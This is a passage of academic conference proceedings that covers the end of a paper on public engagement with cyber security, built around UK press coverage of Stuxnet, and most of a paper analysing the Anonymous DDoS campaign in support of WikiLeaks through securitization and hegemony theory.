The activities of patriotic hackers can put the nation state in a very difficult position, particularly as it is increasingly likely that states will be held liable for, and expected to take responsibility for, any attacks that are launched from their jurisdiction. Physical action may be required to halt such activities (such as disconnecting systems from networks) but alongside this there will be a need for a different form of public engagement that persuades and influences individuals to desist. We need to better understand the management of power in cyberspace where power is no longer concentrated in the nation state but is diffused across the citizen population (Nye, 2010). Cyberspace gives the individual more power by enabling the individual to carry out his or her own will. The nation state has to learn how to counter this expression of power, whether through physical action or by achieving influence in cyberspace through agenda setting or framing activities (Nye, 2010). As the National Research Council (2009) points out, in a worst case scenario it may be necessary for a state to direct a cyber attack against patriotic hackers, and in such a case justification, context, attribution and approval will need to be very carefully considered.
We can see that public engagement is likely to be a key part of a nation’s strategy for ensuring cyber security. As a potential vulnerability individuals need to know how to protect themselves and play their part in protecting the UK’s critical infrastructure. To counter the potential threat from individuals we need to better understand how to frame and manage the cyber agenda, and how to influence and take action if civilian activity endangers the security of the nation state. To achieve these aims we need to understand how to develop messages that engage and inform.
3. The approach
The purpose of this paper is to understand what needs to be done to tackle the problem of public engagement with cyber security. Similarities are often drawn between discussions on cyberspace and the discussions that surrounded nuclear power in previous decades (Clarke & Knake, 2010; Michael et al, 2010). It has been pointed out that even though the nuclear debate involved highly classified information, governments and academics still found a way to discuss the issues so as to develop strategy and policy (Clarke & Knake, 2010). There have been a number of calls recently for more debate among experts on the subject of cyber war and, in particular, for the development of an intellectual framework to discuss cyber issues (National Research Council, 2010). Clarke & Knake take the general call for debate a step further and suggest that ‘in-depth journalism and meaningful academic research’ are needed. At a very basic level, without sufficient debate we will have nothing to inform our public engagement programme.
Our starting point in this paper is that we first need to understand what material is available with which to develop messages. To achieve this aim a two-pronged approach was taken to look at both academic research and journalism on the subject of cyber security. Firstly, a brief review of the academic literature recently published on cyber security was carried out. The review considered the arguments put forward as well as the theoretical approach used in the research. Secondly, an examination of newspaper articles was carried out to explore the messages currently being promulgated to the public. To bound the scope of the research the recent Stuxnet worm incident was chosen as a case study and content analysis was used to thematically examine newspaper reports in the UK that reported the incident.
4. Material for developing a message
There is a paucity of academic literature on cyber and of that which exists much has failed to maintain its currency since the early 2000s. Furthermore there is the problem of writing in academic silos. Denning & Denning (2010) recently published a discussion paper aimed at encouraging computer scientists to participate in the cyber war discussion and suggesting that their voices have not been heard sufficiently. This may be specific to the US; the reverse has always seemed to be the case in the UK, with computer scientists and technologists dominating the debate. Based on recent experience, however, it may well be that this is more a question of different academic communities failing to engage in debate across disciplines, so that only a partial view is ever achieved.
Of the literature that does exist on cyber war there is hardly any that is empirical or grounded in theory. In general there is a tendency to rely on newspaper reports for information or to use what Bendrath (2001) refers to as ‘anecdotal collections of well known hacks’, most often the cyber attacks on Estonia and Georgia. Only a few papers locate their discussion of cyber in a wider theoretical discourse such as risk (Bendrath, 2001) or power (Nye, 2010).
If academic debate and research is lacking then in-depth journalism, as Farivar (2009) points out, is even harder to find. A review of the main period of newspaper reporting of the recent Stuxnet worm in the UK will serve as illustration. The main broadsheet newspapers covered the story and articles also appeared in the Sunday newspapers. The only tabloid newspaper to publish stories on Stuxnet was the Daily Mail. The Economist and the New Scientist also included coverage. This seems encouraging, and stories were not confined to the technology section of newspapers but were also included in world news sections. The first instance of a mention of Stuxnet seems to have been coincidental as it came up during an interview with a computer virus expert from the anti-virus vendor Symantec (The Guardian, 28th August, 2010). This article was in the ‘Money’ section of the newspaper and gave an overview of the working life of the interviewee. It was a month later that the story of Stuxnet took off and began to be widely reported. The main voice that was heard throughout the reporting of Stuxnet and across all mainstream newspapers during this period was from Symantec.
The systems under attack from the Stuxnet worm are generally described as SCADA systems but most reports go further than this and suggest with varying degrees of certainty that a nuclear power station (specifically the Bushehr plant) in Iran was the target asset. Several reports either completely fail to mention that other countries were affected by the worm or refer to it in passing at the end of the article.
In the August report The Guardian was told by Symantec that they had ‘no idea of the source’ and that it was very hard to attribute malware, but it was not long before reports were specifying that only a nation state could have developed the worm and Israel and the US were quickly in the frame. This seems to be attribution by finger-pointing rather than by any forensic evidence, as the reports are primarily reliant on commercial anti-virus vendors. The dominant voice was that of Symantec, with other companies such as Lumension, Sophos, Trend Micro and Kaspersky also giving their views. The only Western Government comments specific to the Stuxnet worm that are attributed in the mainstream media are expressed by the US through General Alexander (the Head of US Cyber Command). It is only towards the very end of the reporting period that we get a broader range of commentators (although not greater depth of commentary) from the Director of the US Cyber Consequences Unit, the Center for Strategic and International Studies in Washington and the International Security Programme at Chatham House.
The Stuxnet worm has been described recently as an important event but a distraction from the task of engaging and educating the public about cyber security. It could be seen, however, as a missed opportunity to educate the public. In the mainstream media there was very little attempt to engage in any debate that went beyond reporting what the anti-virus vendors said. It is unfortunate that, if this was a turning point in cyber security, the dominant voice heard by the public belonged to a commercial company.
There is a real need for debate among experts and academic research both to inform cyber strategy in general and also to provide specific answers to questions such as those around the role of the public. Research has to cross disciplines and acknowledge that cyberspace is both a physical and a social construction and has to be considered as such if we are to make progress. The complexities of the threats and the implications that arise from them have to be explored and discussed. This has to go hand-in-hand with better quality journalism if the public engagement question is to be addressed.
5. Discussion: ‘cyber’ - what’s in a name?
If we are to meaningfully engage with the public we will need well-developed messages that use language with clarity and precision. While too much time can be spent trying to reach definitions that are widely agreed, we do need some differentiation between the terms that we use in order to make thoughts clear and to develop our ideas.
It has been suggested that it is too difficult to categorise different types of cyber attack and that it is pointless to do so because we have to respond to the attack as it is presented. This may be the case operationally for those who are managing the networks and who may not know at the beginning of an incident (or, indeed, at the end) what type of cyber attack or exploitation they have witnessed. Conceptually, however, it is very difficult to debate scenarios without at least some delineation.
The dangers of not doing this are twofold. Firstly, it is highly likely that debates will occur with participants talking at cross purposes, each believing that everyone else sees the world of cyber as they do. Secondly, and more importantly, risk perceptions will become skewed as everything from a hack on a social networking account to online credit card fraud is referred to as ‘cyber war’. The perceived risk of each attack scenario then spirals up and raises the spectre of an attack from a nation state. Conceptually it would be more useful to disentangle the different elements of each scenario to better understand the risk posed (for example, online credit card fraud may be an opportunistic attack, it may be part of a larger criminal operation or it may be used to fund terrorism). Without such differentiation debate tends to collapse. A similar effect occurs through the use of the term ‘attack’: in many cases numbers of attacks are reported but not the damage caused, nor is there usually a definition of what constitutes an attack. This leads to the situation where newspaper reports talk of ‘millions of attacks’ (Nye, 2010), leaving the reader to decide for themselves what this might mean.
Probably the most useful discussion around the need for more precise language for cyber is made by Myriam Dunn Cavelty (2010). She describes a ‘cyber-escalation ladder’ as a way of helping policy makers to prioritise. The first three rungs of the ladder are cyber vandalism and ‘hacktivism’, cyber crime, and cyber espionage. The fourth rung is cyber terrorism and the fifth is cyber war. It seems to me that the first three rungs (with the possible exception of state sponsored cyber espionage) are defended by what we know as information security (in the private sector) or information assurance (in the public sector). She makes the point that by categorising cyber in this way it is possible to debate what form different responses would take. Dunn Cavelty does not define cyber security but it is logical to take this to encompass all of the rungs on this ladder as a generic term.
In his recent speech the Director of GCHQ suggested that 80% of cyber security vulnerabilities could be solved by good information assurance (and, by implication, information security) practices. We have developed approaches to information assurance and information security that have been matured over the last ten years. There is considerable experience across the private and public sector and a growing programme of increasingly cross-disciplinary research. It is the other 20% of cyber that we need to turn our attention to now. This is described as the ‘complex threat’ (Director GCHQ, 2010) and includes, in Dunn Cavelty’s terms, that part of cyber espionage that is state sponsored, cyber terrorism and cyber war.
If we combine the cyber escalation ladder with the assertions made by Director GCHQ we end up with the model below – which may well prove to be a useful way of framing attempts to engage with the public and debate issues across academic disciplines.
Figure 1: A model for discussing cyber security. The figure draws the cyber-escalation ladder, read from the bottom rung up: Cyber Vandalism/Hacktivism, Cyber Crime and Cyber Espionage (bracketed as the 80% of the problem that is already being addressed), then Cyber Terrorism, Cyber War with CNA* used tactically, and Cyber War with CNA* as a strategic and stand-alone activity (bracketed as the 20% of the problem, the ‘complex threat’). *CNA: Computer Network Attack.
A lexicon for cyber is necessary then, at least at a high level, in order to conceptualise the problems and to support work that crosses academic disciplines. Consistency in our use of language is also necessary if we are to engage the public in a meaningful way. A note of caution should be sounded though – such a lexicon needs to be fit for purpose rather than perfect. In other areas, namely information assurance and information security, we have spent too much time trying to define terms to the detriment of actually discussing the issues.
6. Conclusions
Cyber security is the topic of the moment and is likely to be for at least a few years to come. We have practised using ‘cyber’ in various ways and now we need to work out exactly what it means and what the implications are. It is time for engagement with the public and debate among experts. As a first step a lexicon for the subject would support the development of an intellectual framework that crosses academic disciplines. The new cyber security institutions are multi-agency and we need to reflect that academically by bringing together disciplines such as politics, technology, social science, ethics and law. As we have seen the public can be both a vulnerability and a threat in cyberspace and there are complex issues to be examined. Successful engagement with the public will help us deliver the 80% of cyber security suggested by the Director of GCHQ, while the remaining 20% will require a very different type of engagement that includes influence and persuasion activities. Before we can do this though we need to know what our message is by debating the issues. As our thinking develops we can start to encourage better quality journalism that portrays cyber security in a serious and thoughtful way and that engages public thinking, sets the agenda and frames the issues.
References
Bendrath, Ralf (2001) ‘The Cyberwar Debate: Perception and Politics in US Critical Infrastructure Protection’, Information & Security, Vol 7, pp 80-103
Clarke, Richard A. and Knake, Robert K. (2010) ‘Cyber War’, Harper Collins
Denning, Dorothy E. (2003) ‘Information Technology & Security’, Naval Postgraduate School, Center on Terrorism and Irregular Warfare, Monterey, CA
Denning, Peter J. and Denning, Dorothy E. (2010) ‘The Profession of IT: Discussing Cyber Attack’, Communications of the ACM, Vol 53, No 9, pp 29-31
Director, GCHQ (2010) Speech given at the International Institute for Strategic Studies, UK, 13th October 2010, [online] http://www.iiss.org/recent-key-addresses/iain-lobbanaddress/
Dunn Cavelty, Myriam (2010) ‘The Reality and Future of Cyberwar’, Parliamentary Brief, 30th March 2010, [online] http://www.parliamentarybrief.com/2010/03/the-reality-and-future-of-cyberwar
Farivar, Cyrus (2009) ‘A Brief Examination of Media Coverage of Cyberattacks (2007-Present)’, Conference on Cyber Warfare 2009, Conference Proceedings, [online] http://www.ccdcoe.org/230.html
The Guardian (2010) 28th August
The Guardian (2011) 28th January
Michael, James Bret, Tikk, Eneken, Wahlgren, Peter and Wingfield, Thomas C. (2010) ‘From Chaos to Collective Defense’, IEEE Computer, 43(12)
National Research Council (2009) ‘Technology, Policy, Law, and Ethics Regarding US Acquisition and Use of Cyberattack Capabilities’, Owens, William A., Dam, Kenneth W. and Lin, Herbert S. (eds), National Academies Press
Nye, Joseph S. Jr (2010) ‘Cyber Power’, Harvard Kennedy School, Belfer Center for Science & International Affairs, [online] http://belfercenter.ksg.harvard.edu/files/cyber-power.pdf
This is not a Cyber war, it’s a...? Wikileaks, Anonymous and the Politics of Hegemony
David Barnard-Wills
Cranfield University, Shrivenham, UK
d.barnardwills@cranfield.ac.uk
Abstract: This paper conducts a political theory analysis using the conflict, attacks and ‘hacktivism’ surrounding the WikiLeaks organisation following recent diplomatic cable releases as a case study to demonstrate the complexity of contemporary cyber conflict. This complexity is reflected in the motivations, identities and values of a multiplicity of (often non-state) actors. Already termed ‘the first visible cyber war’, this is no simple two-sided conflict (having already drawn in states, media organisations, banks and payments companies, and loose coalitions of individuals) and it is one which traditional metaphors and analogies of war may occlude as much as they reveal. International Relations and critical security studies have developed a range of approaches to international conflict that focus upon the identities, values and normative frameworks of participants. These interpretative movements offer a productive way of understanding cyber conflict, and this paper therefore demonstrates their application. The theory of securitization is used to demonstrate the politics inherent in the act of labelling a conflict ‘war’ and how this applies to the cyber environment. The paper makes use of Antonio Gramsci’s concept of hegemony and Ernesto Laclau’s concept of democratic demands. These models allow us to examine the contested construction of meaning in cyber conflict, a contestation which applies to the very terminology of the discussion. From this perspective, activities such as the distributed denial of service attacks on Mastercard, Visa and others can be interpreted as an attempt to establish a dominant discursive position and to construct a coalition of sentiment and meaning around a set of political issues – in this case freedom of speech and internet censorship in conflict with state and commercial models of online activity. Seen as a struggle for hegemony rather than a ‘war’, we can understand that hegemony is never total, nor permanent. The cyber conflict is not ‘won’ but is instead something that is perpetually worked out.
Keywords: WikiLeaks, cyberwar, cyber conflict, language, international relations
1. Introduction
This paper performs a political theory analysis using the conflict, attacks and hacktivism surrounding the recent publication of US diplomatic cables by the WikiLeaks organisation as a case study to demonstrate the inherent complexity of contemporary cyber conflict.
Analyses of cyberwar threaten to gravitate towards two poles, one arising from International Relations security studies and the second from information security (Nissenbaum 2005). The first of these draws primarily upon geopolitical analysis, the functions and strategic needs of states in an anarchic world system. A typical example might be Joseph Nye’s ‘Cyber Power’ (Nye 2010). These accounts generally attempt to incorporate ‘cyber’ either as a space of conflict (Barnard-Wills & Ashenden Forthcoming) or as a tool for various actors already active in international politics. The second performs a technological analysis of particular network level activity, attempts to locate and assess particular cyber attacks and determine effective countermeasures. An example of the second would be Project Grey Goose (Project Grey Goose 2008). The account of international security politics in such accounts is often theoretically and conceptually shallow, and makes simplifying assumptions about the effects of technological processes on broader social structures.
We present the argument that both of these perspectives lack an understanding of the norms, identities and values that play an important part in accounts of cyber conflict, and that simply taking a middle path between the two poles continues this problem. The paper therefore provides an account drawing upon critical security studies perspectives and a post-structural theory of the formation of group identities.
Critical security studies is a developing set of perspectives within international relations security studies. Traditional geopolitical perspectives (often termed ‘Realism’ within the discipline) are based upon certain foundational rules. States are the primary, or even sole, important actor in international relations. There is always an enemy, but the identity of this enemy is not particularly important for understanding the function of the inter-state system. Conflict is the motivating force in international affairs, and the model assumes that states have permanent interests (Coker 2009, p.131). Following Cox’s insight that ‘Theory is always for somebody and for some purpose’ (Cox 1981), security studies can be seen as developing in the West during the Cold War in an attempt to answer the problem of why states go to war, and to study the threat and use of military force (Peoples & Vaughan-Williams 2009, p.19).
Karen Fierke suggests that, due to attempts to develop new approaches and answers, and a rejection of universal and transitive interests and behaviours among states, critical security studies has arguably been more in line with a changing world than its mainstream counterparts (Fierke 2007, p.27). A sensitivity towards identity and interests is more appropriate than a theory which assumes an unchanging security environment over time (Fierke 2007, p.28). Furthermore, the Realist perspective concerns itself with the interests of states and as such is poorly calibrated for understanding the actions of sub-state or non-state actors (Peoples & Vaughan-Williams 2009, p.20), precisely those that can become involved in cyber conflict.
2. The cyberwar?
This section of the paper sets out a brief overview of the events following the WikiLeaks ‘Cablegate’ release of US diplomatic cables. This series of events has been selected because it demonstrates a number of features that have been increasingly associated with contemporary cyber conflict. It has also been called, somewhat loosely, the first visible cyber war. Because of these features this set of events provides insight for thinking about cyber conflict more broadly. The conflict has involved non-state actors, and the ‘weapon of choice’ appears to be distributed denial of service attacks. However, looking at the events from a holistic perspective that includes political, legal and symbolic aspects suggests a more complicated reading.
In late November 2010 the whistleblowing and journalism organisation WikiLeaks starts to make publicly available secret cables from United States diplomats. It is rapidly condemned by the US government. Over the following days, quite a range of actors becomes involved in this at quite high tempo.
Much of the reporting in the technical media focused upon the movement between various hosting services and a series of electronic attacks. Shortly after the cable release WikiLeaks’ website comes under two denial of service attacks, seemingly from a US ‘patriotic hacker’, which force it offline. Additionally, the Chinese government blocks access to WikiLeaks from within China. The attacks force WikiLeaks to move from servers in France to two Amazon cloud servers on the 29th. Amazon then removes WikiLeaks from its S3 server in the US, stating a terms of service violation (Amazon Web Services 2010). The Berkman Center report on civil society and human rights groups that are the target of denial of service attacks suggests making hosting arrangements closer to the ‘core’ of the internet to benefit from the capacity and resilience of major service providers, and finding internet service providers who will commit not to remove controversial content unless required to by law (Zukerman et al. 2010, p.5). This seems to be the motivation for moving to cloud servers, but it was in this case ineffective due to the unwillingness of such a provider to host. Shortly after, everyDNS.net kills the wikileaks.org address, forcing a move to the Swiss wikileaks.ch. WikiLeaks is now hosted by the Swedish company Bahnhof AB, which excites the media by being inside a bomb shelter.
On the evening of the 3rd December PayPal stops processing donations to WikiLeaks, stating a violation of acceptable use and that it considers WikiLeaks to have violated its service agreement on encouraging, promoting, facilitating and instructing others in illegal activity (PayPal 2010). It is followed on the 7th by Mastercard and Visa Europe, who also stop processing payments. Visa Europe Ltd blocked donations to WikiLeaks and Sunshine Press (the associated fundraising organisation) from December 8th pending an investigation into the nature of WikiLeaks’ business and whether it contravened Visa’s operating conditions. The internal investigation is ongoing, and payments have not been resumed (Associated Press 2011).
Declaring its support for WikiLeaks’ campaign for transparency and free speech, and highly critical of those organisations that had suspended their interactions with the organisation, the internet collective ‘Anonymous’ redirected its Operation Payback away from the Motion Picture Association of America (MPAA) and the International Federation of the Phonographic Industry (Zukerman et al. 2010, p.6) towards the opponents of WikiLeaks. Anonymous has previously also taken action against the Church of Scientology. Anonymous has demonstrated a relatively high level of technical capacity as well as knowledge of its targets. Using distributed denial of service (DDoS) attacks launched with the ‘Low Orbit Ion Cannon’ (LOIC) software, Anonymous attacked PayPal on December 6th and Mastercard on December 8th.
An Anonymous press release suggested a number of tactics in addition to DDoS attacks: a boycott of PayPal, spreading and mirroring the leaked diplomatic cables, forming a ‘human DNS’ system to make them impossible to censor, and upvoting Assange on Time’s person of the year list to increase public exposure. It also advocates posting on ‘critical hubs of information distribution’ to ‘make sure everyone you know is aware of what is happening’. Offline strategies included printing out and distributing locally relevant cables, complaining to local members of parliament or political figures, and conventional protest (marches, petitions etc). Operations Payback and Avenge Assange interweave online strategies and actions into protest and political action. This is not inherently surprising, because the online environment is one of the ‘places’ where people enact politics and economics, communicate with peers and get information. That political communication and protest activity move here too is to be expected.
The ‘Low Orbit Ion Cannon’ software does not disguise IP addresses and potentially leaves users open to tracking. On the morning of January 28th 2011, three teenagers and two adults were arrested in the UK under the Computer Misuse Act 1990 for their alleged involvement in Operation Payback (BBC 2011). A press release from ANON OPS responding to this interpreted the arrests as a sign that the UK government does not understand the ‘present-day political and technological reality’, but also as a declaration of war by the UK government against Anonymous (Anonymous 2010). In co-ordinated activity, the FBI executed more than forty search warrants across the USA, whilst issuing its own press release reminding the public that participating in a DDoS is illegal and punishable by ten years’ imprisonment (FBI National Press Office 2011). This should raise some caution towards the assumption that cyber attacks are generally anonymous.
3. Language and securitization
There are two levels of analysis here – the first is the relatively simple question that asks ‘is the conflict between Anonymous and service providers, in support of WikiLeaks, a cyber war?’ The answer to this is quickly reached, and it is negative. However, this question reveals a second, deeper set of questions about the process of naming and defining a cyber war; a process that involves language and the politics of securitization.
‘Cyber war’ currently has no objective definition against which we can assess an event or series of events and make a clear assessment of whether these events count as cyber war or not. There is a set of usual reasons why such a definition is absent. These revolve around antagonistic relations between states unwilling to settle on a definition which would either curtail their ability to act in this domain, or require them to take particular action that they wish to avoid. Also, in the historical absence of anything universally recognised as a cyber war, comparison is complex.
However, the absence of a clear definition has more substantial epistemological underpinnings. If we spend some time examining cyberwar’s antecedent concept, that of war itself, we can find a similarly contested understanding. Fierke (2007, p.34) describes security as an essentially contested concept, and we can extrapolate a similar understanding of war. The criteria for an essentially contested concept are that it must have value associated with it, be internally complex and part of a broad conceptual landscape, and have relatively open rules of application, so that users can interpret the concept differently in response to different real world events. Typical examples in political theory would be ‘justice’ or ‘equality’, meaningful terms around which political ideologies are structured, and which are used to make political claims.
Political language is not simply descriptive but also evaluative. To term something a ‘war’ or not is not just to describe, but also to judge (Jackson 2005, p.23). To accept an account of an essentially contested concept is also to accept political activity in line with that commitment (Fierke 2007, p.34).
Bobbitt argues that the entire system of laws of war is predicated in part upon the definition of warfare (Bobbitt 2008, p.455). War is a human social artefact (Fierke 2007, p.57), but one that is potentially at odds with other human ends. The search for definitions and checklists misses the contested and politicised nature of language and the penetration of the definitional exercise by securitization moves.
Labelling a set of events as ‘war’ is a clear example of a securitizing move. A theoretical concept initially developed by the Copenhagen school in international relations, ‘securitization’ does not mean ‘to make something more secure’ but rather to define something as needing to be secured (Buzan et al. 1998, p.36). Conventionally, the referent object of this securitization is the nation state, a political regime or ‘the people’. The concept of national security assumes that the nation state has to survive and that it is therefore necessary for the state to maintain armies, produce weapons and seek out intelligence (Peoples & Vaughan-Williams 2009, p.76).
Normal politics is characterised by haggling and contestation between multiple actors and agencies with varying priorities as well as resources. Successfully securitizing an issue removes it from this melee and justifies prioritising it over other issues (Fierke 2007, p.108). When an issue is successfully presented as an existential security threat, it legitimates exceptional political measures (Peoples & Vaughan-Williams 2009, p.76).
Labelling something as war is not a simple matter, however. There are important questions as to who is doing the labelling. Certain actors will be more effective at labelling issues as security issues than others. This relies upon their credibility and right to speak to relevant audiences. A securitizing actor requires enough social and political capital to convince their audience of the existential threat. This authority currently appears to emerge from the two poles of cyber security, state security actors and computer security actors, each with their own forms of securitization. Certain issues are also easier than others to securitize, given their historical associations with existential violence (Peoples & Vaughan-Williams 2009, p.79). The cyber environment is relatively new in this respect, in that it does not really have a history of violence, not in the same way as massed tanks on an international border. Therefore the use of the term ‘war’ is a bridging metaphor to more familiar linguistic descriptions of physical conflict. The concept of ‘information warfare’ is a similar securitizing move, applying military metaphors to industry and commerce (Munroe 2005). Nissenbaum had already highlighted the problems of dominating information security through a political frame (Nissenbaum 2005, p.73), and war can be understood as the paradigmatic form of the political state frame given the state’s claim to a monopoly on the legitimate use of violence.
A different name for the same set of events may generate different perceptions of those events, different emotional and affective responses to them, and different political and strategic responses. Jackson provides the example of a protest, the description of which as a ‘generally ordered protest’ or an ‘anarchist riot’ would affect the way that police forces respond to future demonstrations (2005, p.23). Labelling a series of actions and events as cyberwar therefore suggests a particular set of responses. This is not deterministic, and there is scope for individual or group agency. However, particular discourses – ways of making sense of the world – and particular categorisations construct particular responses as rational and others as nonsensical. The labelling of DDoS attacks as a type of war brings with it a historical set of associations, a set of assumptions about the appropriate way to deal with those problems, and the appropriate agencies for engaging with them. ‘War’ is traditionally the preserve of military agencies, and responses include the use of force. Peoples and Vaughan-Williams argue that the key insight of the securitization model is that security is not always a ‘good thing’:
Securitization of an issue brings with it a particular type of emergency politics where the space (and time) allowed for deliberation, participation and bargaining is necessarily constricted and brings into play a particular militarised mode of thinking (Peoples & Vaughan-Williams 2009, p.83).
For example, treating the teenagers arrested for participating in LOIC attacks as warfighters would be hugely problematic.
We can also suggest that the prefix ‘cyber’ is doing some securitizing work. This prefix is an evocative placeholder for more prosaic terminology, evoking a novel, high-tempo and technological otherworld. For Coker, war seems to have escaped the narrow parameters it was located within during the twentieth century. This is not because of any inherent expansion, but because of the extension of ‘security’, the dominant ‘grammar of violence’ of our age, across the variety of social life (Coker 2009, p.62).
Jackson also identifies the importance of language for legitimating and enacting political violence.
Wars cannot be fought without the willing participation of large numbers of individuals from across the social spectrum. Enlisting such support requires altering the perception of individuals to comprehend the need for employing force, structuring their cognition so it appears as a reasonable and logical course of action and arousing them emotionally so they will participate or at least acquiesce to violence (Jackson 2005, pp.23-24).
Talk of cyberwar is part of a rhetorical chain that prepares the ground for ‘violence’ in cyberspace and for support for this action. It is precisely this dynamic, through which language constructs perceptions and affects political attachments, to which we now turn, again drawing on critical security studies, this time with the focus on the identity and motivations of Anonymous.
4. Anonymous identities, values and demands
The 2006 US Quadrennial Defense Review argued that traditional inter-state threats were giving way to decentralised network threats emerging from non-state actors, and that the spectrum of irregular conflict was expanding. Coker argues that this perception of threats arising from unknown and unknowable non-state actors has penetrated the way the West thinks about conflict (Coker 2009, p.ix). It is easy to see how, from certain perspectives, Anonymous could be seen to fit within this paradigm. Anonymous appears decentralised, ambiguous, non-state and not motivated by the traditional concerns of international relations. It is also harnessing modern information technology for its political activity and to support its decentralised organisation. It fits with a perception of modern hazards as differing from those of the past – they cannot be conveniently or simply delineated in time and space (Coker 2009, p.70).
It also fits with the concern regarding the apparent proliferation of ‘patriotic hackers’. Much attention has been paid to an apparent developing trend, in which popular cyber campaigns mirror political, economic or military conflicts in cyberspace, primarily conducted by ‘cyber militia’ (Ottis 2010b, p.1). Estonia in 2007 and Georgia in 2008 are seen as the paradigmatic examples of this type of activity, with a focus upon militia either directed by a state, or self-organising along lines that parallel state interests. Activity by these militia is considered problematic because they are often anonymous (small ‘a’) and their association to a state is hard to ascertain. Comparing such militia to ‘farmers with laptops’, Ottis provides a breakdown of the minimum resources and skills required to conduct an effective cyber campaign, and finds very low barriers to action, especially for manual or voluntary botnets for distributed denial of service attacks (Ottis 2010a). However, he does suggest that a requirement for a successful cyber campaign is that some members must have a deeper understanding of cyber activity.
However, not all participants in cyber conflict are driven by nationalist affiliation, nor by association with existing political organisations – even decentralised ones. We can relate this activity to a process of identity formation associated with a collective horizon of values and perceived interests. The self-proclaimed intentions and motivations of groups such as Anonymous should be taken seriously in any coherent analysis of their activity. Identity should be understood as an ongoing, continual process rather than a settled descriptor or essential, unchanging aspect. For Fierke it is a social category that incorporates the self-ascribed identity that the individual actor gives themselves, but also the definitions one ascribes to others and those that others ascribe to oneself (Fierke 2007, p.76). Identity is fundamentally relational.
Anonymous describes itself as ‘not a group, but rather an internet gathering’ (ANONOPS press release), but this is itself problematic. There is no membership structure, no officers, designated representatives or legal existence. One can join simply by claiming to have done so (or even by identifying with Anonymous). Being on certain forums will make one more aware of what it is doing and more able to participate in its activities. However, one can speak for Anonymous simply by doing so (and in a sense, every Anon forum post does so), although how seriously this is taken by a range of interested actors will vary. One is a member of Anonymous simply to the extent that one recognises oneself as a member of Anonymous. Whilst spokespeople for Anonymous have communicated with mainstream media (for example ‘Coldblood’ was interviewed on the BBC Radio 4 ‘Today’ programme), this language mirrors that used in other protest movements. Students in Paris in 1968, and anti-globalisation activists in the late 1990s, both regularly stated that their representatives were only spokespeople, not leaders.
This draws upon a consensus/participation model, in which if an identifying individual doesn’t like a particular action, they can simply not participate in that action without any in-group consequences. Nor is Anonymous without internal discussion. For example, the use of denial of service attacks has not been without its internal criticism, and caution has been expressed that continued DDoS attacks will promote a public backlash (Keane 2011). An Anonymous press release discusses the group’s relationship with WikiLeaks and argues that the association is primarily a shared set of ethics and political goals.
“while we don’t have much of an affiliation with WikiLeaks, we fight for the same reasons. We want transparency and we counter censorship. The attempts to silence wikileaks are long strides closer to a world where we can not say what we think and are unable to express our opinions and ideas.” (http://pandalabs.pandasecurity.com)
The extent to which the members are known to each other is open to question. Ottis discussed cyber militia with relatively loose ties, which require them to communicate online. Anonymous, with its origins in 4chan, arguably has a different relationship. To talk, as Ottis does, of ‘real life’ connections is to miss the point somewhat, and to negate the importance of online created and lived identities. Ottis suggests that this lack of ‘real world’ connections creates a particular vulnerability to information operations techniques (Ottis 2010b, p.2). However, some connections in these online environments can be very deep, very detailed and very meaningful. Of course, other connections can be very ephemeral. It is hard, however, to disentangle the two from an external perspective.
The concepts of hegemony and democratic demands provide us with potential analytical purchase upon the Anonymous cyber attacks. The Marxist philosopher and social theorist Antonio Gramsci’s (1891-1937) theory of hegemony was part of an attempt to overcome the economic determinism of Marxist thought. Rather than being determined by the economic substructure, explanations of social change were instead to be found in the relatively autonomous realm of ideas and ideology. This was to emphasise the role of human agency and choice. Hegemony is the ability to gain control of the ideas that shape social consciousness. Rather than being solely determined from above, this was ‘a negotiation between the dominant and controlled class over what the latter will accept to believe and what they will not swallow’ (Woodfin & Zarate 2004, p.123), and as such was an ongoing process. In trying to explain the uneven and unsuccessful nature of socialist revolution across Europe in the early 20th century, Gramsci suggested that revolution can only take place if there is a genuine alternative worldview accepted by the widest range of exploited social groups.
For Laclau, for a political demand to be classed as democratic, it must meet two criteria. Firstly, it is a demand formulated to the system by an underdog of some kind; because of this it carries an egalitarian dimension. Secondly, the very emergence of a democratic demand presupposes some kind of exclusion or deprivation (Laclau 2005, p.125). Laclau’s analysis of populist reason and the emergence of collective group identities suggests that it is the making of demands that cannot be fulfilled that is necessary for the emergence of shared identities (Laclau 2005, p.127). Given that Laclau’s study is addressed to populist social movements, for example those in Eastern Europe or Latin America, these shared identities are often ‘the people’; however, we can identify certain similarities with collective identities such as that articulated by Anonymous and other WikiLeaks supporters. The Anonymous press release sums this up by saying ‘we are not a group of hackers, we are average Internet Citizens’ (Anonymous 2010). The January 28th press release does, however, also refer to Anonymous as ‘the people’ (Anonymous 2010). Any essential characteristics of membership are effaced in their communication, which stresses inclusion and ideas. Whilst we can anticipate some demographic striations (age, gender, language etc.) of participants, these are not seen as important to the communicators.
‘an interest in freedom and openness belongs to a world of liberal democracies where these practices are tied to legitimacy’ (Fierke 2007, p.80).
We can therefore contextualise Anonymous as an open, expansive movement driven by a set of values formed around the online environment, freedom, and lack of censorship. Perceiving WikiLeaks as ideologically aligned, members recognise this value set and identify themselves as members of Anonymous and of a wider incipient non-state collective identity as internet citizens. The impossible demand for absolute freedom of speech solidifies the group identity in the face of external contestation. Their target is not system security but rather a much broader communicative field; not a power-politics but a more discursive one: DDoS as communicative act and presentation of nascent political identity.
5. Conclusions
It is fairly unproblematic to suggest that the digitally mediated contestation between the hacktivist group Anonymous, in support of WikiLeaks, and various online payment providers is not an example of war. It is, however, an example of how complicated a multi-actor international political environment can be and of how a traditional state-centric perspective on security is fundamentally flawed in the cyber domain. To this end the paper suggests drawing upon critical security studies perspectives from International Relations and social theory. The Copenhagen school account of the process of securitization allows us to understand the importance of language and speech acts in creating and maintaining a security environment, and suggests caution in the application of the label ‘war’. Secondly, the perspective also directs attention towards the identities, values and processes of group formation which bring together a loose coalition of online actors in support of a particular value set and political position. This account is a useful corrective to accounts of ‘patriotic hackers’ or ‘cyber jihad’, and it is hoped that wider adoption of the theoretical tools
and perspectives of critical security studies in the field of cyber conflict can allow it to move beyond shallow and empirically lacking models.
References
Amazon Web Services, 2010. Message. Available at: http://aws.amazon.com/message/65348/ [Accessed February 2, 2011].
Anonymous, 2010. ANON OPS: A Press Release. Available at: http://www.wired.com/images_blogs/threatlevel/2010/12/ANONOPS_The_Press_Release.pdf [Accessed January 28, 2011].
Associated Press, 2011. The Associated Press: No proof WikiLeaks breaking law, inquiry finds. Available at: http://www.google.com/hostednews/ap/article/ALeqM5jwrDLCLioMJW7qeke8jNQP3_vGLg?docId=8824887824cc4c89982bbe407c103304 [Accessed January 31, 2011].
